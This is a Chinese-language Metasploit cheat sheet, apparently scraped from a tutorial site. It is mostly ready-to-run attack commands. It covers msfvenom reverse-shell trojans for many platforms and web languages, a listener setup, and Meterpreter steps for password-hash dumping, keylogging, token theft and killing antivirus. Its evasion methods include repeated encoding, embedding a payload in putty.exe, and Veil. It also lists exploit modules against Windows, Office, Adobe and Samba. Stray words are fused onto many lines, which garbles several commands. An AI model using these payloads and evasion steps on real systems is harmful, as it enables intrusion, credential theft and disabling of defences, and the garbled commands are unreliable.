Metasploit Penetration Testing

時間 2019-11-29

標籤 metasploit penetration testing 简体版

原文原文鏈接

一、Metasploit總體框架：

Shell中直接輸入msfconsole
啓動PostgreSQL數據庫服務：service postgresql start 監聽5432端口
初始化Metasploit數據庫：msfdb init
查看數據庫聯接狀況：msfconsole db_status
創建數據庫緩存：msfconsole db_rebuild_cachephp

專業術語

– Exploit，攻擊工具/代碼
– Payload，攻擊載荷
– Shellcode
– Module，模塊
– Listener，監聽器css

目錄結構：

Kali Linux /usr/share/metasploit-frameworkhtml

經常使用命令

show exploits – 查看全部可用的滲透攻擊程序代碼
show auxiliary – 查看全部可用的輔助攻擊工具
show options – 查看該模塊全部可用選項
show payloads – 查看該模塊適用的全部載荷代碼
show targets – 查看該模塊適用的攻擊目標類型
search – 根據關鍵字搜索某模塊
info – 顯示某模塊的詳細信息
use – 進入使用某滲透攻擊模塊
back – 回退
set/unset – 設置/禁用模塊中的某個參數
setg/unsetg – 設置/禁用適用於全部模塊的全局參數
save – 將當前設置值保存下來，以便下次啓動MSF終端時仍可以使用java

msfvenom （攻擊載荷生成和編碼器）

主要參數：
-p payload
-e 編碼方式
-i 編碼次數
-b 在生成的程序中避免出現的值
-f exe生成EXE格式
-l 能夠查看能夠利用payload eg：msfvenom -l | grep windows | grep x64 | grep tcp
LHOST,LPORT 監聽上線的主機IP和端口python

一、生成木馬文件

操做系統linux

Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx -f exe > shell.exe
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=x.x.x.x LPORT=xx -f macho > shell.machogit

開發語言：
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=xx -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx -f asp > shell.asp
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=xx -f raw > shell.jsp
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=xx -f war > shell.wargithub

腳本語言：
Python:
msfvenom -p cmd/unix/reverse_python LHOST=x.x.x.x LPORT=xx -f raw > shell.py
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=x.x.x.x LPORT=xx -f raw > shell.sh
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=x.x.x.x LPORT=xx -f raw > shell.plweb

操做舉例：

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=172.16.0.4 LPORT=443 -f exe > abc.exemsf > use exploit/multi/handlermsf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST 172.16.0.4
msf exploit(handler) > set ExitOnSession false #讓connection保持鏈接(即便一個鏈接退出,仍然保持listening狀態)
msf exploit(handler) > exploit -j -z #-j(計劃任務下進行攻擊，後臺) -z(攻擊完成不遇會話交互)
msf exploit(handler) > jobs #查看後臺攻擊任務
msf exploit(handler) > kill <id> #中止某後臺攻擊任務
msf exploit(handler) > sessions -l #(查看會話)
msf exploit(handler) > sessions -i 2 #選擇會話
msf exploit(handler) > sessions -k 2 #結束會話
Ctrl+z 把會話放到後臺
Ctrl+c 結束會話sql

Meterpreter後攻擊：

Meterpreter提供的功能包括反追蹤、純內存工做模式、系統信息獲取、密碼哈希導出、文件上傳下載、屏幕截取、鍵盤記錄、權限提高、跳板攻擊等等。
meterpreter > background 放回後臺
meterpreter > exit 關閉會話
meterpreter > help 幫助信息
meterpreter > Sysinfo 系統平臺信息
meterpreter > screenshot 屏幕截取
meterpreter > shell 命令行shell (exit退出)
meterpreter > getlwd 查看本地目錄
meterpreter > lcd 切換本地目錄
meterpreter > getwd 查看目錄
meterpreter > ls 查看文件目錄列表
meterpreter > cd 切換目錄
meterpreter > rm 刪除文件
meterpreter > download C:\\Users\\123\\Desktop\\1.txt 1.txt 下載文件
meterpreter > upload /var/www/wce.exe wce.exe 上傳文件
meterpreter > search -d c: -f *.doc 搜索文件
meterpreter > execute -f cmd.exe -i 執行程序/命令
meterpreter > ps 查看進程
meterpreter > run post/windows/capture/keylog_recorder 鍵盤記錄
meterpreter > getuid 查看當前用戶權限
meterpreter > use priv 加載特權模塊
meterpreter > getsystem 提高到SYSTEM權限
meterpreter > hashdump 導出密碼散列
meterpreter > ps 查看高權限用戶PID
meterpreter > steal_token <PID> 竊取令牌
meterpreter > rev2self 恢復原來的令牌
meterpreter > migrate pid 遷移進程
meterpreter > run killav 關閉殺毒軟件
meterpreter > run getgui-e 啓用遠程桌面
meterpreter > portfwd add -l 1234 -p 3389 -r <目標IP> 端口轉發
meterpreter > run get_local_subnets 獲取內網網段信息
meterpreter > run autoroute -s <內網網段> 建立自動路由
meterpreter > run autoroute -p 查看自動路由表
建立代理通道:
msf > use auxiliary/server/socks4a 設置socks4代理模塊
msf auxiliary(socks4a) > show options
msf auxiliary(socks4a) > run
配置proxychains參數：
nano /etc/proxychains.conf 修改代理監聽端口,和前面端口一致
quite_mode 設置成安靜模式：去掉以下參數前面的註釋

免殺技術：

一、屢次編碼免殺
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -f exe -o /var/www/html/reverse_http_encode.exe
二、自定義二進制代碼的文件模板免殺
使用「putty.exe」做爲文件模板，並且隨着putty程序運行而隱蔽同時運行，還使用編碼器進行了編碼。
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -x ~/putty.exe
三、使用Veil生成免殺代碼
下載地址：
https://github.com/Veil-Framework/Veil-Evasion (只集合了Evasion)
https://github.com/Veil-Framework/Veil
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
cd setup
sudo ./setup.sh -c#一路回車就行，默認安裝就行
cd ~/Veil
./Veil.py
use Evasion #使用Veil-Evasion工具
list #列舉全部模塊
use #使用某個模塊
use c/meterpreter/rev_http.py
set #設置變量
generate #生成可執行代碼
接着就是加載msf監聽模塊，等待用戶的上線了

二、Metasploit Auxiliary：

2.一、scanner：

portscan syn掃描
use auxiliary/scanner/portscan/syn
Metasploit SMB掃描獲取系統信息
use auxiliary/scanner/smb/smb_version
批量識別ssh指紋識別
use auxiliary/scanner/ssh/ssh_version
批量識別ftp指紋識別
use auxiliary/scanner/ftp/ftp_version
SNMP掃描與枚舉
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
smb登陸驗證
use auxiliary/scanner/smb/smb_login
VNC身份驗證
use auxiliary/scanner/vnc/vnc_none_auth

2.二、sniffer：

密碼嗅探
use auxiliary/sniffer/psnuffle

2.三、掃描wmap：

小結wmap：

1.啓動msf數據庫
2.msf加載wmap
load wmap
3.wmap添加一個sites
wmap_sites -a  http://xxx.com.cn
查看添加的list
wmap_sites -l
4.wmap添加一個targets
wmap_targets -t http://192.168.x.xxx
使用-d添加targets
wmap_targets -d 0
清空添加的list
wmap_targets -c
5.執行漏洞掃描
wmap_run -e
6.查看掃描到的漏洞
wmap_vulns
7.導出漏洞掃描結果
db_export -f xml /root/database.xml

掃描實例詳情：http://192.168.19.141

msf > load wmap 

.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap

msf > wmap_sites  -h 
[*] Usage: wmap_sites [options]
	-h        Display this help text
	-a [url]  Add site (vhost,url)
	-d [ids]  Delete sites (separate ids with space)
	-l        List all available sites
	-s [id]   Display site structure (vhost,url|ids) (level) (unicode output true/false)


msf > wmap_sites  -a http://192.168.19.141
[*] Site created.
msf > wmap_targets -c 

msf > wmap_targets  -h 
[*] Usage: wmap_targets [options]
	-h 		Display this help text
	-t [urls]	Define target sites (vhost1,url[space]vhost2,url) 
	-d [ids]	Define target sites (id1, id2, id3 ...)
	-c 		Clean target sites list
	-l  		List all target sites

msf > wmap_targets  -d 0
[*] Loading 192.168.19.141,http://192.168.19.141:80/.
msf > wmap_targets  -l 
[*] Defined targets
===============

     Id  Vhost           Host            Port  SSL    Path
     --  -----           ----            ----  ---    ----
     0   192.168.19.141  192.168.19.141  80    false  	/
 
msf > wmap_run -e 
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*] 	Site: 192.168.19.141 (192.168.19.141)
[*] 	Port: 80 SSL: false
============================================================
[*] Testing started. 2018-09-09 05:26:51 -0400
[*] Loading wmap modules...
[*] 39 wmap enabled modules loaded.
[*] 
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*] 
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version

[+] 192.168.19.141:80 Apache/2.4.7 (Ubuntu)
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
[*] Module auxiliary/admin/http/tomcat_utf8_traversal
[*] Attempting to connect to 192.168.19.141:80
[+] No File(s) found
[*] Module auxiliary/scanner/http/drupal_views_user_enum
[-] 192.168.19.141 does not appear to be vulnerable, will not continue
[*] Module auxiliary/scanner/http/frontpage_login
[*] 192.168.19.141:80     - http://192.168.19.141/ may not support FrontPage Server Extensions
[*] Module auxiliary/scanner/http/host_header_injection
[*] Module auxiliary/scanner/http/options
[+] 192.168.19.141 allows GET,HEAD,POST,OPTIONS methods
[*] Module auxiliary/scanner/http/robots_txt
[*] Module auxiliary/scanner/http/scraper
[+] [192.168.19.141] / [SQL Injections]
[*] Module auxiliary/scanner/http/svn_scanner
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/trace
[*] Module auxiliary/scanner/http/vhost_scanner
[*]  >> Exception during launch from auxiliary/scanner/http/vhost_scanner: The following options failed to validate: DOMAIN.
[*] Module auxiliary/scanner/http/webdav_internal_ip
[*] Module auxiliary/scanner/http/webdav_scanner
[*] 192.168.19.141 (Apache/2.4.7 (Ubuntu)) WebDAV disabled.
[*] Module auxiliary/scanner/http/webdav_website_content
[*] 
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] Path: /
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/copy_of_file
[*] Module auxiliary/scanner/http/dir_listing
[*] Path: /
[*] Module auxiliary/scanner/http/dir_scanner
[*] Path: /
[*] Detecting error code
[*] Using code '404' as not found for 192.168.19.141
[+] Found http://192.168.19.141:80/cgi-bin/ 403 (192.168.19.141)
[+] Found http://192.168.19.141:80/icons/ 403 (192.168.19.141)
[+] Found http://192.168.19.141:80/images/ 200 (192.168.19.141)
[*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
[*] Path: /
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/file_same_name_dir
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/files_dir
[*] Path: /
[*] Using code '404' as not found for files with extension .null
[*] Using code '404' as not found for files with extension .backup
[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .c
[*] Using code '404' as not found for files with extension .cfg
[*] Using code '404' as not found for files with extension .class
[*] Using code '404' as not found for files with extension .copy
[*] Using code '404' as not found for files with extension .conf
[*] Using code '404' as not found for files with extension .exe
[*] Using code '404' as not found for files with extension .html
[+] Found http://192.168.19.141:80/index.html 200
[*] Using code '404' as not found for files with extension .htm
[*] Using code '404' as not found for files with extension .ini
[*] Using code '404' as not found for files with extension .log
[*] Using code '404' as not found for files with extension .old
[*] Using code '404' as not found for files with extension .orig
[*] Using code '404' as not found for files with extension .php
[*] Using code '404' as not found for files with extension .tar
[*] Using code '404' as not found for files with extension .tar.gz
[*] Using code '404' as not found for files with extension .tgz
[*] Using code '404' as not found for files with extension .tmp
[*] Using code '404' as not found for files with extension .temp
[*] Using code '404' as not found for files with extension .txt
[+] Found http://192.168.19.141:80/readme.txt 200
[*] Using code '404' as not found for files with extension .zip
[*] Using code '404' as not found for files with extension ~
[*] Using code '404' as not found for files with extension 
[+] Found http://192.168.19.141:80/images 301
[+] Found http://192.168.19.141:80/index 200
[+] Found http://192.168.19.141:80/readme 200
[*] Using code '404' as not found for files with extension 
[+] Found http://192.168.19.141:80/images 301
[+] Found http://192.168.19.141:80/index 200
[+] Found http://192.168.19.141:80/readme 200
[*] Module auxiliary/scanner/http/http_put
[*] Path: /
[-] 192.168.19.141: File doesn't seem to exist. The upload probably failed
[*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
[*] Path: /
[-] 192.168.19.141:80 Folder does not require authentication. [405]
[*] Module auxiliary/scanner/http/prev_dir_same_name_file
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/replace_ext
[*] Module auxiliary/scanner/http/soap_xml
[*] Path: /
[*] Starting scan with 0ms delay between requests
[*] Server 192.168.19.141:80 returned HTTP 404 for /.  Use a different one.
[*] Module auxiliary/scanner/http/trace_axd
[*] Path: /
[*] Module auxiliary/scanner/http/verb_auth_bypass
[*] 
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] Module auxiliary/scanner/http/http_traversal
[*] Module auxiliary/scanner/http/rails_mass_assignment
[*] Module exploit/multi/http/lcms_php_exec
[*] 
=[ Query testing ]=
============================================================
[*] 
=[ General testing ]=
============================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Launch completed in 169.54123091697693 seconds.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[*] Done.
msf > wmap_vulns 
[*] Usage: wmap_vulns [options]
	-h 		Display this help text
	-l 		Display web vulns table

msf > wmap_vulns -l 
[*] + [192.168.19.141] (192.168.19.141): scraper /
[*] 	scraper Scraper
[*] 	GET SQL Injections
[*] + [192.168.19.141] (192.168.19.141): directory /cgi-bin/
[*] 	directory Directoy found.
[*] 	GET Res code: 403
[*] + [192.168.19.141] (192.168.19.141): directory /icons/
[*] 	directory Directoy found.
[*] 	GET Res code: 403
[*] + [192.168.19.141] (192.168.19.141): directory /images/
[*] 	directory Directoy found.
[*] 	GET Res code: 200
[*] + [192.168.19.141] (192.168.19.141): file /index.html
[*] 	file File found.
[*] 	GET Res code: 404
[*] + [192.168.19.141] (192.168.19.141): file /readme.txt
[*] 	file File found.
[*] 	GET Res code: 200
[*] + [192.168.19.141] (192.168.19.141): file /images
[*] 	file File found.
[*] 	GET Res code: 404
[*] + [192.168.19.141] (192.168.19.141): file /index
[*] 	file File found.
[*] 	GET Res code: 404
[*] + [192.168.19.141] (192.168.19.141): file /readme
[*] 	file File found.
[*] 	GET Res code: 404
msf > 
#參考：https://www.jianshu.com/p/67315789a8f8

第2章信息收集與掃描

2.1 信息收集分類：

被動式信息收集
主動式信息收集
社會工程學

2.2 被動式信息收集1.0——傳統方式

whois

dig

nslookup

在線查詢

http://who.is
http://www.kloth.net

2.3 被動式信息收集1.0——升級方式

區域傳送：

SMTP頭：

Google dork：

2.4 端口掃描——Nmap方式

分析4種類型：TCP connect san、SYN stealth scan、UDP scan、ACK scan （sT、sS、sU、sA）

TCP connect [-sT]

SYN scan [-sS]

UDP scan [-sU]

ACK scan [-sA]

-sV

-O

Decoy [-D]

增長匿名性

2.5 用於掃描的輔助模塊

/modules/auxiliary/scanner

搜索端口掃描

search portscan

批量測試是否開放tomcat、等

2.6 使用Nessus進行漏洞掃描

msf> db_connect msf3:8b826ac0@127:7175/msf3

msf> load nessus

msf> nessus_connect root:toor@localhost ok

msf> nessus_scan 1 testscan 192.168.56.102

msf> nessus_report_list

msf> nessus_report_get xxx

msf> hosts -c address,vuls,os_name

2.7 使用NeXpose進行掃描

msf> db_connect msf3:8b826ac0@127:7175/msf3

msf> load nexpose

msf> nexpose_connect darklord:toor@localhost ok

msf> nexpose_discover 192.168.56.102

msf> hosts -c address,os_name,os_flavor

msf> db_import nexposelist.xml

2.8 使用Dradis框架共享掃描信息

3 操做系統漏洞評估與利用

一、Windows XP

1.一、MS03_26_dcom

exploit/windows/dcerpc/ms03_026_dcom

Rank 爲：great port:135

DCOM(分佈式組件對象模型)接口，運行在RPC的端口上，RPC協議中對畸形消息的處理存在錯誤

payload windows/adduser

payload windows/shell/bind_tcp

#能夠找到原文件查看源碼adduser是怎麼實現的。

二、Windows 2003 Server

2.一、MS08_067_netapi

exploit/windows/smb/ms08_067_netapi

Rank 爲：great port:445

netapi32.dll執行路徑鏈接代碼中的分析漏洞，可繞過NX特性，防止Server服務崩潰。

三、Windows 7/Server 2008 R2

3.一、ms10_006_negotiate_response_loop

auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop

Rank:normal

將UNC路徑傳遞給web頁面，並誘使目標用戶執行，用戶打開共享文件以後，目標系統將徹底崩潰，只能從新啓動恢復

msf exploit(ms08_067_netapi) > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > run 

[*] Starting the malicious SMB service...
[*] To trigger, the vulnerable client should try to access: \\127.0.0.1\Shared\Anything
[*] Server started.

四、Linux

4.一、Samba

exploit/linux/samba/lsa_transnames_heap

CVE-2007-2446

激發Samba守護進程的LSA RPC服務中的堆溢出漏洞，並使用talloc chunk 重寫方法（credit Ramon and Adriano）

使用用於 Samba 3.0.21-3.0.24版本

值的學習的兩個模塊：

一、Samba chain_reply 內存損壞漏洞：

分配給響應數據包的內存，可經過傳遞超過目標緩衝區大小的值實現

受影響版本：Samba 3.3.13以前

二、Samba trans2open 溢出：

利用沒有noexec棧選項的 x86 Linux機器中的漏洞

受影響版本：Samba 2.2.0-2.2.8

五、理解Windows DLL注入

5.一、webdav_dll_hijacker

exploit/windows/browser/webdav_dll_hijacker

建立包含漏洞的目錄路徑，目標機器須要執行該路徑以便激活漏洞。

目錄能夠是文件、提早的文件夾、USB驅動器或網絡共享等。

建立的文件自己是無害的，但會執行DLL注入漏洞來攻擊目標系統

DLL（動態連接庫）是微軟Windows操做系統中共享庫的一種實現。

運行時loadlibray()函數將加載運行時必須的DLL，若是沒有指定位置，或者提供非全限定的庫路徑時，

會使用自定義的搜索順序進行DLL搜索，其中默認搜索位置就是程序的當前工做目錄。

因爲當前工做目錄是由攻擊者控制的，攻擊者能夠在其中添加惡意的DLL代碼，並由操做系統執行，

從而使攻擊者能夠執行外部腳本，攻擊載荷成功執行後，會創建shell連接。

5.二、探測DLL注入漏洞

H.D.Moore的DLLHijackAudit安全審計工具。

https://github.com/rapid7/DLLHijackAuditKit/releases/

六、客戶端漏洞利用與防病毒軟件規避

6.1 IE瀏覽器

1.不安全腳本錯誤配置

exploit/windows/browser/ie_unsafe_scripting

漏洞影響：IE 六、7（XP、2003）IE 8（WIN7）

exploit命令生成一個惡意連接，受害者點擊連接後，IE崩潰或者顯示空白頁。（IE 8 須要點擊Allow按鈕）

容許對ActiveX控件WScript.Shell 進行訪問，WScript.Shell對象提供了讀取文件系統、環境變量、讀取並修改註冊表，快捷方式管理等函數，

從而使攻擊者利用控件建立JavaScript腳本與目標主機文件系統進行交互並運行相應命令。

2.Internet Explorer Aurora內存損壞

exploit/windows/browser/ms10_002_aurora

CVE-2010-0249只針對IE 6內存損壞漏洞攻擊

2010中期，攻擊者利用「Operation Aurora」攻擊過一些頂級公司

3.CSS遞歸調用內存損壞

exploit/windows/browser/ms11_003_ie_css_import

CVE-2010-3971漏洞影響：IE 8 （win7 和Server 2008）

payload：windows/meterpreter/bind_tcp

生成一個惡意連接，目標主機使用IE打開後，IE瀏覽器將徹底「凍結」，並消耗大量的系統資源，目標主機將不得不關閉瀏覽器

InitialAutoRunScript 'migrate -f'

migate -f:

將攻擊載荷從iexplore.exe進程轉移給notepad.exe進程。

有助於保持持久連接，即使用戶關閉了瀏覽器，還能夠通行，由於shell已經轉移到另外的進程。

若是提示：「Target machine does not have the .NET CLR 2.0.50727」，須要將IE設置爲默認瀏覽器便可

6.2 Microsoft Offices

1.Word RTF棧溢出

exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

CVE-2010-3333漏洞影響：Office 2010 和 Office 2007

payload：windows/meterpreter/reverse_tcp

惡意word文檔將非法值傳遞給word分析器，分析器沒法識別非法值從而致使緩衝區溢出。

而後攻擊載荷開始運行，並創建連接。是否攻擊成功，取決於目標機器自身情況，

由於Windows ASLR（地址空間佈局隨機化）會阻止執行任意代碼。

2.Excel 2007 緩存區溢出

exploit/windows/fileformat/ms11_021_xlb_bof

CVE-2011-0105漏洞影響：Excel 2007

執行惡意xlb文件致使棧溢出執行任意代碼

6.3 Adobe

1.Adobe Reader until.printft ()緩衝區溢出

exploit/windows/fileformat/adobe_utilprintf

CVE-2008-2992漏洞影響：< 8.1.3

快速恢復滲透過程：exploit/multi/handler

特殊的監聽器模塊

Adobe Reader 軟件中JavaScript函數util.printf() 的實現出現了錯誤。

該函數將其接受的參數轉換爲字符串，可是使用最開始的16個數字，

其他部分使用固定值0（0x30）進行填充，若是向該函數傳遞一個超長度值...

var num 1.2

util.printf("%5000f",num)

這簡單的2行代碼的功能是將字節0x20在棧中複製5000次，從而能夠控制異常處理程序，並在嘗試寫入棧後的內存端時觸發異常。

6.4 msfpayload

BT下運行，kali2已將msfpayloa 和 msfencoe合併成msfvenom

攻擊載荷windows/shell/reverse_tcp生成其C語言形式的shellcode

msfpayload windows/shell/reverse_tcp o 
msfpayload windows/shell/reverse_tcp  LHOST = 192.168.56.101 LPORT = 4441 o 
msfpayload windows/shell/reverse_tcp  LHOST = 192.168.56.101 LPORT = 4441 C
msfpayload windows/shell/reverse_tcp  LHOST = 192.168.56.101 LPORT = 4441 X > .local/setup.exe

6.5 msfencoe

BT下運行，kali2已將msfpayloa 和 msfencoe合併成msfvenom

3個案例：

msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 R | msfencode -e cmd/generic_sh -c 2 -t exe > .local/encoded.exe
msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 R | msfencode -e x86/shikata_ga_nai -c 20 -t exe -x cmd.exe > .local/cmdencoded.exe
msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 R | msfencode -e x86/shikata_ga_nai -c 20 -t vbs -x cmd.exe > .local/cmdtest2.vbs

6.6 killav.rb

1. run kalliav

meterpreter> run killav

2.解讀killav.rb腳本

kali2：/usr/share/metasploit-framework/scripts/meterpreter/killav.rb

以%W數組的形式包含了一個完整的進程列表，在目標機上進行搜索並殺禁制。

數組名在目標系統中尋找匹配，找到後使用process.kill函數禁制該進程

3.仍是沒被禁用呢？

可能殺毒軟件是以服務的形式運行，殺死進程後，立刻服務又把它開啓進程。

進程是基於用戶的，而服務是基於系統的。

假如是AVG防病毒軟件：

tasklist：尋找各類可用的任務

/SVC參數只列出服務形式運行的進程

/F 參數用於強制禁制進程

tasklist /SVC | find /I "avg"

tasklist /F /IM "avg*"

C:\Users\lenovo>tasklist /SVC | find /I "avg"

C:\Users\lenovo>tasklist /F /IM "avg*"

4.有些服務仍是沒法禁用呢？

net stop

sc config

相關標籤/搜索

metasploit+postgresql

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。